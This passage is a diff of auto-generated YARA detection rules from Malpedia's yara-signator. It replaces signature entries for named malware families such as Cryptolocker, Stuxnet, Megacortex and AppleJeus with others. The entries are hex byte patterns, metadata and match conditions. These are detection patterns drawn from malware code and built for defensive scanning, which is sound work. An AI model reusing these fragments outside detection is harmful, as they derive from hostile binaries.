MALPEDIA_Win_Hyperssl_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0108 3310 c1c607 c1c210 } - $sequence_1 = { 33c3 8b5c244c c1ee12 0bfe 33cf 8bf2 } - $sequence_2 = { 0105???????? 8d8d5cffffff 89855cffffff 898560ffffff } - $sequence_3 = { 2bf0 5f 8a10 301401 8a10 301406 40 } - $sequence_4 = { 40 4f 75f2 5f 5e e9???????? c3 } - $sequence_5 = { 7436 8b413c 03c1 742a } - $sequence_6 = { 03c1 742a 8b4028 03c1 } - $sequence_7 = { 0101 0100 0100 0100 } - $sequence_8 = { 0100 0200 0200 0002 0002 } - $sequence_9 = { 33c0 40 5d c20c00 6a08 } - $sequence_10 = { 0108 3908 1bc9 f7d9 } - $sequence_11 = { 8b4028 03c1 7423 56 57 } - $sequence_12 = { ff15???????? 8bc8 85c9 7436 8b413c } - $sequence_13 = { 0105???????? 8d558c 89458c 894590 } - $sequence_14 = { c20c00 6a08 68???????? e8???????? 8b450c 83f801 } - $sequence_15 = { 0101 014514 2bf3 8b5d0c } - $sequence_16 = { 01442428 8b442428 884500 45 } - $sequence_17 = { 017e0c 5f 8bc6 5e c20800 } - $sequence_18 = { 017e0c 395e10 740f ff7610 } - $sequence_19 = { 017e08 8bc3 e8???????? c20400 } - $sequence_20 = { 017e0c 8d4d08 e8???????? 5f } - $sequence_21 = { 011d???????? 5f 8935???????? 5e } - $sequence_22 = { 017e08 50 e8???????? ff0d???????? } - $sequence_23 = { 016b08 897b04 5f 5e } + $sequence_0 = { ffd6 68???????? 57 8945d8 ffd6 68???????? 53 } + $sequence_1 = { 51 53 ff505c 85c0 } + $sequence_2 = { 50 6a00 6a01 ff7608 } + $sequence_3 = { 57 6800000040 51 ff5010 8bd8 } + $sequence_4 = { 81ec4c0a0000 80a5b4f9ffff00 56 baff000000 } + $sequence_5 = { 8b4b24 8b431c 8b5320 8365fc00 } + $sequence_6 = { 50 e8???????? 83c410 8b461c } + $sequence_7 = { 8bec 81eccc040000 53 56 8b35???????? 57 } + $sequence_8 = { ffd0 5e c3 ff15???????? 5e c3 } + $sequence_9 = { 66a5 a4 be???????? 8dbd60ffffff } condition: - 7 of them and filesize <835584 + 7 of them and filesize <65536 } -rule MALPEDIA_Win_Cryptolocker_Auto : FILE +rule MALPEDIA_Win_Woolger_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ef7778bc-4b3f-57b9-be94-b68bbd4e0a82" + id = "903b676c-1246-53ac-bdc3-0b77fc0dda3c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cryptolocker_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.woolger_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "308de5ca9cd2927cd67ef4efc7cb0917b58e872fb565dc9ff1066d1520a7dec9" + logic_hash = "403d441c2bcd327a0a5f26d737426637c32fb82ed6205c2fd16dc75ea4a861d4" score = 75 quality = 75 tags = "FILE" @@ -178900,32 +181713,32 @@ rule MALPEDIA_Win_Cryptolocker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d4a9f 6683f905 770f c1e004 } - $sequence_1 = { 0f858f000000 a1???????? 85c0 7509 } - $sequence_2 = { 898431ecfeffff 8b4ee8 85c9 740e 8b01 } - $sequence_3 = { ff7720 56 ff15???????? 8b4510 8b4b04 5f 5e } - $sequence_4 = { 7405 83f802 7549 85c9 } - $sequence_5 = { 8b75fc 33c9 85c0 0f48f1 7522 85f6 781e } - $sequence_6 = { c20800 55 8bec 83ec08 53 56 8b7508 } - $sequence_7 = { 8b4ee8 85c9 740e 8b01 6a01 8b4004 03c8 } - $sequence_8 = { 55 8bec 56 8b750c 8d8600ffffff 83f801 7723 } - $sequence_9 = { 0fb7044a 83f820 740f 83f809 7205 83f80d } + $sequence_0 = { 83f814 750a be???????? e9???????? 83f81b } + $sequence_1 = { 83ec54 6a40 8d45b0 6a00 50 c745ac44000000 e8???????? } + $sequence_2 = { 33c5 8945fc 33c0 668945d4 } + $sequence_3 = { 6685c0 8d85fcfeffff 50 0f95c3 ff15???????? 8b4f08 } + $sequence_4 = { 52 ff15???????? 83f801 0f858d000000 } + $sequence_5 = { 6a00 68???????? ff15???????? 68???????? 6a01 6a00 } + $sequence_6 = { 66a5 8dbdfcf8ffff 4f 8a4701 47 84c0 } + $sequence_7 = { 6a00 8d8dd4f4ffff 51 ffd6 85c0 75db } + $sequence_8 = { 83c414 81ffb80b0000 5f 7c40 e8???????? e8???????? } + $sequence_9 = { 3da2000000 0f8403010000 3da3000000 0f84f8000000 3da4000000 0f84e6000000 3da5000000 } condition: - 7 of them and filesize <778240 + 7 of them and filesize <196608 } -rule MALPEDIA_Win_Webc2_Adspace_Auto : FILE +rule MALPEDIA_Win_Apocalypse_Ransom_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "31690ec3-53d2-516a-a2ac-2daa7b554ffe" + id = "d42c3028-47d8-5c2a-8245-ee48597fdb68" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_adspace" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_adspace_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalypse_ransom" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.apocalypse_ransom_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "7852a8a7e96f78b645860237edf52acf830636cf13e5faeed5b1eb81bda4c09a" + logic_hash = "3006a8aede4427b243aedfb686311f3de66b1be38f627de23e7cfc996b17033d" score = 75 quality = 75 tags = "FILE" @@ -178939,32 +181752,32 @@ rule MALPEDIA_Win_Webc2_Adspace_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d8580feffff 68???????? 50 ffd6 ff750c 894510 } - $sequence_1 = { ffd6 8bf8 c70424???????? ffd6 } - $sequence_2 = { 50 8d8580feffff 50 e8???????? 8b35???????? 8d8580feffff } - $sequence_3 = { 8d4dec e8???????? 8d4dec e8???????? 6a0a ff15???????? a1???????? } - $sequence_4 = { c3 56 8b742408 56 e8???????? 59 8b4c2410 } - $sequence_5 = { 0f84f8010000 80a4241c01000000 6a3f 59 33c0 } - $sequence_6 = { 7469 6a00 57 56 } - $sequence_7 = { 50 e8???????? 83c40c 8bf8 8d45fc 50 } - $sequence_8 = { 59 33c0 85ff 59 } - $sequence_9 = { a1???????? 40 50 57 56 } + $sequence_0 = { ff15???????? 68???????? 8d84240c040000 50 ff15???????? 85c0 742f } + $sequence_1 = { 83f8ff 755f 6a01 8d44240c 50 8d8c2410040000 } + $sequence_2 = { 0bfb ff15???????? 33d2 83f802 } + $sequence_3 = { 8d4c2410 68???????? 51 ff15???????? 83c410 6a00 6a00 } + $sequence_4 = { ffd6 b801000000 5e 83c418 c3 33c0 } + $sequence_5 = { 68???????? 6a00 ffd7 8bf0 85f6 7504 5f } + $sequence_6 = { 83f8ff 7411 50 ff15???????? 8d0424 50 ff15???????? } + $sequence_7 = { 83c40c 57 53 ff15???????? 6800800000 } + $sequence_8 = { ffd7 85c0 7440 8b1d???????? 8b2d???????? 8b542410 8d4c2410 } + $sequence_9 = { 6a03 6800000040 52 ffd6 } condition: - 7 of them and filesize <49152 + 7 of them and filesize <40960 } -rule MALPEDIA_Win_Absentloader_Auto : FILE +rule MALPEDIA_Win_Megacortex_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9aab04f2-7678-5cf8-8d74-f6db3f7fcf22" + id = "7fddab37-921e-5d3c-ad85-73c5c61f21f7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.absentloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.absentloader_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.megacortex" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.megacortex_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "77496690e6eb66a44354cd3e27ded72ee59f2468546d53e2a80ae68b108dd0bf" + logic_hash = "c51529de49cb40cceae5744ecd99824ed147bc3c171c405f7c4b90f895a230e9" score = 75 quality = 75 tags = "FILE" @@ -178978,32 +181791,32 @@ rule MALPEDIA_Win_Absentloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { fe81b89406fd 89148d909406fd 8d4dfc e8???????? 5e c9 c3 } - $sequence_1 = { eb16 66c704375c6e eb0e 66c704375c74 eb06 66c704375c62 83c602 } - $sequence_2 = { e8???????? c645fc12 8bcb 0f2805???????? 0f1145b4 6a7f } - $sequence_3 = { 740f 33c0 80b034a606fd2e 40 83f814 72f3 8b0d???????? } - $sequence_4 = { 8bec 56 ff7508 8bf1 e8???????? c706841e05fd } - $sequence_5 = { 7408 3a8ac05d05fd 755a 8b06 8a08 40 42 } - $sequence_6 = { 7e37 68f8aa06fd e8???????? 833d????????ff 59 7523 bffcaa06fd } - $sequence_7 = { 7417 6827130000 6830f405fd 68341606fd e8???????? 83c40c 837f2c00 } - $sequence_8 = { c9 c3 6a08 b8a30305fd e8???????? 8bf1 8975ec } - $sequence_9 = { 84db 743b 8b4608 8378fc00 7432 83ec10 8d4668 } + $sequence_0 = { 50 e8???????? 8b7d0c 8bf0 83c40c 85f6 0f8517010000 } + $sequence_1 = { 895d84 7202 8b06 6a00 6800000003 6a03 6a00 } + $sequence_2 = { 50 8d85c4fdffff 50 e8???????? 8b95e0fdffff 83c408 c645fc01 } + $sequence_3 = { 8d4101 2bf0 89450c 8975ec ff7508 83fe03 0f823a020000 } + $sequence_4 = { e8???????? 8b4508 8d4d08 83c404 c645f801 8945fc c7450800000000 } + $sequence_5 = { 83f81f 0f87b70e0000 52 51 e8???????? 83c408 33c0 } + $sequence_6 = { f7d8 1bc0 23c1 50 8b45ec 51 8bf4 } + $sequence_7 = { 1bf6 23f1 8bce 2bca 85f6 be01000000 0f44ce } + $sequence_8 = { e8???????? 83c40c 8d8d2cffffff e8???????? 8d8d44ffffff c645fc2e e8???????? } + $sequence_9 = { 6a00 6a00 68000000c0 8d45cc c645fc05 50 8d8d28feffff } condition: - 7 of them and filesize <794624 + 7 of them and filesize <1556480 } -rule MALPEDIA_Win_Hdmr_Auto : FILE +rule MALPEDIA_Win_Teleport_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "efac4b5a-015c-5408-9681-2898b333d92b" + id = "20d896b0-1f61-5a48-80a3-7c8e4c6de03e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hdmr" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hdmr_auto.yar#L1-L114" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.teleport" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.teleport_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "d93eae97d145bb46a0ed753e26aa98381b2be0cfcaaaf5d8753f4519f5f83cf1" + logic_hash = "a391399ac3b60b63dbd3a4a77f0c3e70c536a7803fbc2f2dce00674fad1b8479" score = 75 quality = 75 tags = "FILE" @@ -179017,32 +181830,32 @@ rule MALPEDIA_Win_Hdmr_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8945e0 85c0 7461 8d0cbd40d04100 8901 8305????????20 8b11 } - $sequence_1 = { 8945ec 894df0 894dfc 8b16 8b523c 50 } - $sequence_2 = { c1e810 4a 75e6 eb07 } - $sequence_3 = { 56 8b7508 68fe070000 8d85fef7ffff 6a00 } - $sequence_4 = { 85db 0f8492010000 8b8d70ffffff 0fb709 } - $sequence_5 = { 250000ff00 81e3000000ff 33c3 8bda 81e2ff000000 } - $sequence_6 = { 0fb701 0fb71c0f 2bc3 2bc2 } - $sequence_7 = { 75ea 8a03 3c61 0fbec0 } - $sequence_8 = { 8b400c 51 52 8bce ffd0 5e 5b } - $sequence_9 = { 50 ff15???????? 8d8c24780a0000 51 } + $sequence_0 = { 50 8945fc 68???????? c745f001000000 } + $sequence_1 = { 57 8bfa 897de8 89b7a0000000 8b4104 8987a4000000 8b5108 } + $sequence_2 = { 8806 46 89b504ffffff 8b8d04ffffff 0fb6f0 8d85f8feffff 56 } + $sequence_3 = { c685effeffff00 50 6a00 6a00 c785e0feffff14000000 c785e4feffff00000000 c785f0feffff01000000 } + $sequence_4 = { 8d8d80f7ffff 899d68f7ffff e8???????? 83cb08 f6c304 740e } + $sequence_5 = { 8b35???????? 6a28 85f6 7451 c78560f7ffff80b54200 e8???????? 898584f7ffff } + $sequence_6 = { 668945a8 eb17 837e3408 8d4620 c7401000000000 7202 8b00 } + $sequence_7 = { 330c8560c24200 0fb6c2 330c8560b64200 8bc3 c1e810 894de0 898f94000000 } + $sequence_8 = { 1bc0 83c801 85c0 0f8400010000 b8???????? 8d8d60fdffff 6690 } + $sequence_9 = { 894110 7208 8b09 898d74ffffff 8d0436 50 } condition: - 7 of them and filesize <284672 + 7 of them and filesize <458752 } -rule MALPEDIA_Win_Bravonc_Auto : FILE +rule MALPEDIA_Win_Stuxnet_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e1447c3c-8c4c-54e5-9d2c-b00b52d2dc03" + id = "e84f453f-688f-5279-9168-a0cb915408b7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bravonc" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bravonc_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stuxnet_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "76468ca1f8266a49d1bb0da33f680bf0a2046353d9d66d58507a76281c00d1b6" + logic_hash = "9f5d56947917572e8a9b84c0e49b11ae5a34a590900f3243fcc05249be23cf0d" score = 75 quality = 75 tags = "FILE" @@ -179056,32 +181869,32 @@ rule MALPEDIA_Win_Bravonc_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f8c05040000 8b06 3b7804 0f8dfa030000 395e04 7407 50 } - $sequence_1 = { 5b c3 55 8bec 53 33db 395d0c } - $sequence_2 = { 57 ff75ec 334dec 030a 034df0 8d8401d6c162ca 8945f0 } - $sequence_3 = { 8907 8b45f4 2bfb 59 59 8907 8b45fc } - $sequence_4 = { 83c430 8bce 53 56 e8???????? 5f 5e } - $sequence_5 = { e8???????? 8b0e 030f c1e104 2bc1 eb08 8d4de0 } - $sequence_6 = { ff75f0 e8???????? 8b4df8 83c440 334dec 57 } - $sequence_7 = { 335dfc 3175fc 83c118 ff4df0 8bf2 8b55fc 8955f8 } - $sequence_8 = { 83450c08 ebd2 d36d08 8b0c8590b24000 234d08 014df0 8bc8 } - $sequence_9 = { 03f3 2bfb 03f3 890f } + $sequence_0 = { e8???????? 8b5dec 8b45f0 895df4 8945f8 ff770c 8d75ec } + $sequence_1 = { c20400 b8???????? e8???????? 51 6a08 e8???????? 59 } + $sequence_2 = { e8???????? 33db 895dfc 53 8d45d8 50 6802000080 } + $sequence_3 = { 6aff 68???????? 64a100000000 50 64892500000000 83ec64 8d442420 } + $sequence_4 = { eb02 33f6 c645fc00 8b4f1c 3bf1 740a 85c9 } + $sequence_5 = { 837df008 8b45dc 7303 8d45dc 50 8d431c e8???????? } + $sequence_6 = { c706???????? e8???????? c645fc01 c6462400 834dfcff 8b4df4 8bc6 } + $sequence_7 = { a5 50 a5 ff5130 85c0 7cb0 8b9b48080000 } + $sequence_8 = { ff750c ff7510 8d45e4 50 e8???????? c645fc01 8d4def } + $sequence_9 = { ff7508 8d4df4 e8???????? 837d14ff 7d04 33c0 eb12 } condition: - 7 of them and filesize <131072 + 7 of them and filesize <2495488 } -rule MALPEDIA_Win_Puzzlemaker_Auto : FILE +rule MALPEDIA_Win_Photolite_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e93d66ca-a521-530d-a49f-9104b54671e2" + id = "91b305a0-4121-51a1-b4d2-2f8343c04744" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.puzzlemaker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.puzzlemaker_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.photolite" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.photolite_auto.yar#L1-L166" license_url = "N/A" - logic_hash = "f4b400ba752d2bb5a757bcaa926474306cca33660eefc885e89a26d2aeb5ebe7" + logic_hash = "caefd484ddfe657e42e053f8e8452f60715f0696ed8aba66627e49aa5e3366fe" score = 75 quality = 75 tags = "FILE" @@ -179095,32 +181908,38 @@ rule MALPEDIA_Win_Puzzlemaker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 48890b 488d5308 488d4808 0f1102 e8???????? 488d053c0e0100 488903 } - $sequence_1 = { f20f5cca f2410f590cc1 660f28d1 660f28c1 4c8d0dbb980000 f20f101d???????? } - $sequence_2 = { 0fb705???????? 66d1e8 6683e07f f30f6f05???????? } - $sequence_3 = { e8???????? 488bd8 488945a7 4885c0 7432 } - $sequence_4 = { 48895db7 4885db 0f84ca000000 4c896c2428 4c896c2420 4c8d4d07 4533c0 } - $sequence_5 = { 4489542444 81fae9fd0000 0f857e010000 4c8d3deddafeff } - $sequence_6 = { 488910 48895008 c3 4883ec28 4885c9 7411 488d0590e30100 } - $sequence_7 = { c705????????090400c0 c705????????01000000 c705????????01000000 b808000000 486bc000 488d0da6f80100 8b542430 } - $sequence_8 = { 48898520050000 488b05???????? 488d154a1b0200 488b0d???????? 4533ed 488985f8010000 } - $sequence_9 = { 488d0db4270100 e8???????? 85c0 740e ba01000000 488bcd ff15???????? } + $sequence_0 = { c7859802000042cc7257 c7859c02000075cc545d c785a002000040c02638 8b8594020000 8a8590020000 84c0 751e } + $sequence_1 = { ff15???????? 498bd6 488d4d76 ff15???????? 8a4301 } + $sequence_2 = { c7859405000037f43a3a c785980500002fef391c c7859c0500000be1241d c785a00500002fe54a79 8b8590050000 8a858c050000 84c0 } + $sequence_3 = { 8a85e0020000 84c0 751e 488bcb 8b848de4020000 } + $sequence_4 = { 4803cf 483bce 72e5 885c244c c744245057106c10 c7442454556a4c30 } + $sequence_5 = { 8bc3 4d03ca 85d2 7474 448bc0 } + $sequence_6 = { 7421 0f1002 488bc2 482bc6 482bc7 } + $sequence_7 = { 7307 488b7c2430 eba3 488b5c2448 } + $sequence_8 = { 48895d38 48895da0 895d30 488b01 ff5070 8bf8 85c0 } + $sequence_9 = { 488bd8 4885c0 0f8419010000 488b15???????? } + $sequence_10 = { 488bcb ffd0 ffc6 41b8bb010000 8bd6 } + $sequence_11 = { 84c0 0f85f5000000 4885db 7451 488b05???????? 4885c0 7426 } + $sequence_12 = { 72e9 4c8d442444 41b901000000 488d047e 410fb6d1 } + $sequence_13 = { 3dc8000000 0f849d000000 488b5d28 4885db } + $sequence_14 = { 75f2 33db 4084f6 0f84e6000000 } + $sequence_15 = { 488d542474 488d8de0020000 ff15???????? 408874245c } condition: - 7 of them and filesize <331776 + 7 of them and filesize <99328 } -rule MALPEDIA_Win_Hi_Zor_Rat_Auto : FILE +rule MALPEDIA_Win_Mespinoza_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3dc62db9-3a05-5424-a3c8-d6fd9e595782" + id = "6af67872-bac6-59d0-8e7f-a6515453822a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hi_zor_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hi_zor_rat_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mespinoza" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mespinoza_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "3acb0fc19d1323e3198577328eeef1259397f6589eae60512b85396f5cbd245b" + logic_hash = "b9e1c3335fd9ffa3b60b976c6289b141c236447ff76a5dd17787957756af56c7" score = 75 quality = 75 tags = "FILE" @@ -179134,32 +181953,32 @@ rule MALPEDIA_Win_Hi_Zor_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c644303080 8b4e24 83e13f 80f937 7614 8bc6 e8???????? } - $sequence_1 = { ff15???????? 8b4d08 57 8bf0 51 56 } - $sequence_2 = { e8???????? 8b1d???????? 83c418 6804010000 8d8df4fdffff 51 } - $sequence_3 = { 23da 8bfa 8b5014 f7d7 } - $sequence_4 = { 8b5818 8db41e604b0000 c1e610 c1ef10 0bfe } - $sequence_5 = { 037018 f7d2 8975f8 897014 8bfa 0b55f8 } - $sequence_6 = { 57 51 50 8945f4 e8???????? 8b450c } - $sequence_7 = { 50 51 e8???????? 83c424 893e 5f 5e } - $sequence_8 = { ffd6 8b55ec 83c404 52 ffd6 83c404 } - $sequence_9 = { 83c40c 6a00 8d450c 50 6800e00100 8d4608 50 } + $sequence_0 = { 8d4d9c e8???????? 83eb01 75e7 8b4d0c } + $sequence_1 = { 897d0c c645fc01 85ff 7446 56 8bcf e8???????? } + $sequence_2 = { 8b4dc4 8b7dc0 6aff 6a01 } + $sequence_3 = { 891f 895f04 6a01 895dfc e8???????? 59 894704 } + $sequence_4 = { 03c1 3bc1 7334 8bde 8bf1 2bf0 } + $sequence_5 = { 75f9 2bd6 8db5f8feffff 8d5e01 8a06 46 84c0 } + $sequence_6 = { 83e03f 6bd030 895de4 8b049d00b04700 8945d4 8955e8 8a5c1029 } + $sequence_7 = { 8b6c240c 56 57 55 8bf9 e8???????? 8b37 } + $sequence_8 = { 64a300000000 8965f0 8b7508 8b7d0c 8975ec c745fc00000000 0f1f440000 } + $sequence_9 = { 8bc3 2bc2 894714 8b7508 8bce e8???????? 84c0 } condition: - 7 of them and filesize <73728 + 7 of them and filesize <1091584 } -rule MALPEDIA_Win_Ruckguv_Auto : FILE +rule MALPEDIA_Win_Stealer_0X3401_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "70c59136-1542-5cb3-8c7d-52dba7e0bc40" + id = "bb4f4861-3b94-5ae9-a941-991186118cf0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ruckguv" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ruckguv_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealer_0x3401" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stealer_0x3401_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "a64635c0a8f169255c2ded62c13acd231a3b9a4460e9b10acd2e149c6348dd85" + logic_hash = "5581efed5fdecbce8348574e847d7eb07ab8e38c2ac3e166eb58c72b5a5419d5" score = 75 quality = 75 tags = "FILE" @@ -179173,32 +181992,32 @@ rule MALPEDIA_Win_Ruckguv_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7403 51 eb04 0fb7c0 50 ff7508 } - $sequence_1 = { 56 53 e8???????? 8b463c 68f8000000 } - $sequence_2 = { ff75fc 8d85b0f7ffff 50 ff75f4 } - $sequence_3 = { 59 894508 85c0 750f 8b470c } - $sequence_4 = { 85c0 0f848b000000 57 8d3c18 8b470c 85c0 } - $sequence_5 = { 8a0a 84c9 75f1 c3 682680acc8 } - $sequence_6 = { 83c0c0 50 8d4640 50 8d4340 } - $sequence_7 = { 68dff0f081 6a01 e8???????? 83c40c 8d8d9cfdffff 51 ffd0 } - $sequence_8 = { 6880000000 6a03 56 56 53 } - $sequence_9 = { 59 59 ff742404 ffd0 c3 6831f478b7 } + $sequence_0 = { 03f2 8bd6 85f6 7e37 8d8d5cfeffff e8???????? } + $sequence_1 = { 53 e8???????? 83c41c c74424280f000000 c744242400000000 c644241400 803b00 } + $sequence_2 = { 5f 894df0 8b34cd50fa0110 8b4d08 6a5a 2bce } + $sequence_3 = { 83781410 7202 8b00 ffb57cfdffff } + $sequence_4 = { c745fc05000000 8d8d5cffffff e8???????? c645fc06 83781410 7202 } + $sequence_5 = { 8b8db87dffff 40 3d00100000 722a f6c11f } + $sequence_6 = { 64a300000000 8b35???????? 8d8574ffffff 50 6a00 } + $sequence_7 = { 8d8598feffff 3bc3 7435 8bc8 e8???????? } + $sequence_8 = { 8d4c2434 e8???????? 53 e8???????? 83c404 8d44242c 8bcf } + $sequence_9 = { ffb5843fffff ffd7 83bd803fffff00 0f84ec000000 6a12 68???????? b9???????? } condition: - 7 of them and filesize <41024 + 7 of them and filesize <357376 } -rule MALPEDIA_Win_Applejeus_Auto : FILE +rule MALPEDIA_Win_Selfmake_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2b213dd7-4b0e-53d6-9398-7bec043b88e3" + id = "ca04d6b7-e045-5526-8793-d9e1e0d359e9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.applejeus" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.applejeus_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.selfmake" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.selfmake_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "0a3d67a5753a00f446b4f5eec17ef4a4499de52aeb8e82581c3d643c4e67e3d2" + logic_hash = "c57531acfc321c5fdc74a4f21330394c8edf44f2f30ab3dcaf573b2b773dc0b6" score = 75 quality = 75 tags = "FILE" @@ -179212,32 +182031,32 @@ rule MALPEDIA_Win_Applejeus_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8902 8b4608 8b08 8b4604 810044f3ffff 8100bc0c0000 } - $sequence_1 = { 8b4604 8b00 33c2 0f8583000000 c745f45b000000 8b45f4 83f032 } - $sequence_2 = { 8945dc 8d45d0 c745d0a08e4200 897dd4 8975d8 0f1145b0 } - $sequence_3 = { 8b4a04 50 0f1145c8 c745a8e0294200 0f1145d8 897dac 8975b0 } - $sequence_4 = { e8???????? 8b4dc8 83c414 8945cc 89851cffffff c700???????? 897004 } - $sequence_5 = { c745e400000000 8b410c 50 6a00 51 8b04851cfb4600 ffd0 } - $sequence_6 = { c68589f5ffff7d c6858af5ffff85 c6858bf5ffff72 c6858cf5ffff83 c6858df5ffff59 c6858ef5ffff3a c6858ff5ffff77 } - $sequence_7 = { 8d4db0 e9???????? 8d4db4 e9???????? 8d4dac e9???????? 8b542408 } - $sequence_8 = { e8???????? 8b7588 8d4d94 83c418 e8???????? c78568ffffffd5030000 8b8568ffffff } - $sequence_9 = { 8d85d42e0000 50 ff15???????? 57 ff15???????? e9???????? ff15???????? } + $sequence_0 = { 83c104 3bf0 7ce3 68???????? } + $sequence_1 = { 83e107 894df4 8b55f4 52 ff15???????? a1???????? 8be5 } + $sequence_2 = { 8d742430 742e e8???????? 6aff } + $sequence_3 = { 47 84c0 75f8 66a1???????? 668907 8d44243c 8bd0 } + $sequence_4 = { 8945f8 837df800 7408 8b45f8 e9???????? e8???????? } + $sequence_5 = { 8b4b2c 6a00 6a01 51 ffd0 8b16 83c604 } + $sequence_6 = { 7604 2bf1 eb02 33f6 8b4310 25c0010000 83f840 } + $sequence_7 = { 81fa???????? 7209 83c014 3bc1 72eb } + $sequence_8 = { 51 e8???????? 8b742418 8bbc2418020000 } + $sequence_9 = { e8???????? 56 e8???????? 8b442424 8b35???????? 83c414 50 } condition: - 7 of them and filesize <1245184 + 7 of them and filesize <932864 } -rule MALPEDIA_Win_Snojan_Auto : FILE +rule MALPEDIA_Win_Matryoshka_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "96ddba9d-1a09-5178-a027-761c3b0ea160" + id = "3e8b1848-3ea9-5312-86aa-83712c0906a6" date = "2023-12-06" modified = "2023-12-08" - reference = 